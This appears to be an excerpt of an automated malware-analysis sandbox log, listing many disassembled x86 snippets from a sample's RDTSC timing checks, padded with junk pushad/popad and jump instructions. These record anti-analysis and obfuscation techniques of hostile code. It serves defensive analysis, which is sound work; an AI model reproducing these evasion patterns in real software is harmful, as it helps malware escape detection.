Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0AA1 second address: 51B0AE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F45412F257Ch 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 mov edx, 71AF142Eh 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F45412F2587h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0AE2 second address: 51B0AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0AFF second address: 51B0B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B05 second address: 51B0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B25 second address: 51B0B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0B29 second address: 51B0B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B06CB second address: 51B0707 instructions: 0x00000000 rdtsc 0x00000002 mov bh, 7Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F45412F2580h 0x0000000d push eax 0x0000000e jmp 00007F45412F257Bh 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F45412F2585h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0707 second address: 51B073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4540B7FD28h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B073A second address: 51B0740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0740 second address: 51B0746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0746 second address: 51B074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B05D1 second address: 51B0631 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4540B7FD21h 0x00000008 add eax, 6AC0C866h 0x0000000e jmp 00007F4540B7FD21h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F4540B7FD1Eh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F4540B7FD1Ch 0x00000027 sbb al, 00000038h 0x0000002a jmp 00007F4540B7FD1Bh 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0631 second address: 51B0636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0636 second address: 51B063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B063C second address: 51B0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0640 second address: 51B0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0644 second address: 51B0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e mov dx, si 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0656 second address: 51B0698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F4540B7FD1Bh 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4540B7FD25h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0698 second address: 51B069E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B069E second address: 51B06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B06A2 second address: 51B06A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B03D5 second address: 51B03DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B03DB second address: 51B03DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B03DF second address: 51B03E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B03E3 second address: 51B0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F45412F2580h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F45412F2580h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F45412F2580h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F45412F257Dh 0x00000026 pop esi 0x00000027 movsx edx, si 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0107 second address: 51C0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ah, D4h 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F4540B7FD22h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F4540B7FD20h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4540B7FD27h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0168 second address: 51C018F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 mov eax, edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F0878 second address: 51F08B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F4540B7FD20h 0x0000000c and ch, FFFFFFE8h 0x0000000f jmp 00007F4540B7FD1Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4540B7FD20h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F08B6 second address: 51F08BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F08BA second address: 51F08C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F08C0 second address: 51F08C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F08C6 second address: 51F08FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushfd 0x0000000f jmp 00007F4540B7FD1Eh 0x00000014 jmp 00007F4540B7FD25h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F08FA second address: 51F091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45412F257Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F091F second address: 51F098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4540B7FD27h 0x00000009 sbb si, 54FEh 0x0000000e jmp 00007F4540B7FD29h 0x00000013 popfd 0x00000014 mov ch, 8Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4540B7FD24h 0x00000024 sub cl, 00000028h 0x00000027 jmp 00007F4540B7FD1Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F098A second address: 51F099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45412F2580h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D0199 second address: 51D019F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D019F second address: 51D01A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D01A3 second address: 51D01DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, si 0x00000012 pushfd 0x00000013 jmp 00007F4540B7FD1Eh 0x00000018 add ah, 00000018h 0x0000001b jmp 00007F4540B7FD1Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D01DA second address: 51D020E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F45412F257Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D020E second address: 51D0212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D0212 second address: 51D0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D0216 second address: 51D021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D021C second address: 51D0258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F45412F2580h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F45412F257Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D0258 second address: 51D0267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B052B second address: 51B0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45412F257Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0550 second address: 51B0560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0560 second address: 51B0588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45412F2584h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51B0588 second address: 51B058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0D46 second address: 51C0D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0D4A second address: 51C0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0D50 second address: 51C0D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0D56 second address: 51C0D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4540B7FD21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0D74 second address: 51C0DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45412F2583h 0x00000014 add ax, 29DEh 0x00000019 jmp 00007F45412F2589h 0x0000001e popfd 0x0000001f mov eax, 219D14A7h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0DC7 second address: 51C0DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0DCD second address: 51C0DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51D0011 second address: 51D0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007F4540B7FD28h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F4540B7FD1Dh 0x0000001b and cl, 00000046h 0x0000001e jmp 00007F4540B7FD21h 0x00000023 popfd 0x00000024 mov eax, 3BA9B1F7h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F000A second address: 51F0036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45412F2587h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F0036 second address: 51F003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F003C second address: 51F0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F0040 second address: 51F0068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4540B7FD24h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F0068 second address: 51F0169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F45412F2586h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov cl, DDh 0x00000014 mov bx, 01EEh 0x00000018 popad 0x00000019 push esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F45412F2580h 0x00000021 jmp 00007F45412F2585h 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F45412F2580h 0x0000002d xor ch, FFFFFF98h 0x00000030 jmp 00007F45412F257Bh 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [esp], ecx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F45412F2584h 0x00000041 adc cx, BEF8h 0x00000046 jmp 00007F45412F257Bh 0x0000004b popfd 0x0000004c call 00007F45412F2588h 0x00000051 push eax 0x00000052 pop edi 0x00000053 pop ecx 0x00000054 popad 0x00000055 mov eax, dword ptr [775165FCh] 0x0000005a jmp 00007F45412F257Dh 0x0000005f test eax, eax 0x00000061 jmp 00007F45412F257Eh 0x00000066 je 00007F45B3595D92h 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F45412F2587h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F0169 second address: 51F016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F016F second address: 51F01E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d jmp 00007F45412F2586h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 mov si, di 0x00000019 pushfd 0x0000001a jmp 00007F45412F2583h 0x0000001f add al, 0000003Eh 0x00000022 jmp 00007F45412F2589h 0x00000027 popfd 0x00000028 popad 0x00000029 and ecx, 1Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F45412F257Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F01E3 second address: 51F01F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4540B7FD1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F01F3 second address: 51F01F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51F02B4 second address: 51F02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007F4540B7FD21h 0x0000000a call 00007F4540B7FD20h 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov eax, 7B78F7F9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0008 second address: 51A000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A000C second address: 51A0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0010 second address: 51A0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0016 second address: 51A003C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4540B7FD20h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A003C second address: 51A0040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0040 second address: 51A0046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0046 second address: 51A004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A004C second address: 51A0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0050 second address: 51A0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0054 second address: 51A00B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4540B7FD23h 0x00000010 adc cl, 0000003Eh 0x00000013 jmp 00007F4540B7FD29h 0x00000018 popfd 0x00000019 mov si, 5687h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4540B7FD29h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A00B1 second address: 51A00B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A00B7 second address: 51A00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A00BB second address: 51A0136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f call 00007F45412F2584h 0x00000014 mov di, cx 0x00000017 pop eax 0x00000018 mov ecx, ebx 0x0000001a popad 0x0000001b push ebx 0x0000001c jmp 00007F45412F2586h 0x00000021 mov dword ptr [esp], ecx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F45412F257Eh 0x0000002b and eax, 71DF6E88h 0x00000031 jmp 00007F45412F257Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 mov ecx, 3E36AB15h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0136 second address: 51A0184 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1F63E391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e pushfd 0x0000000f jmp 00007F4540B7FD26h 0x00000014 add cx, 4418h 0x00000019 jmp 00007F4540B7FD1Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4540B7FD24h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A0184 second address: 51A018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A018A second address: 51A01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F4540B7FD1Eh 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 jmp 00007F4540B7FD20h 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4540B7FD1Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51A01CE second address: 51A01D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
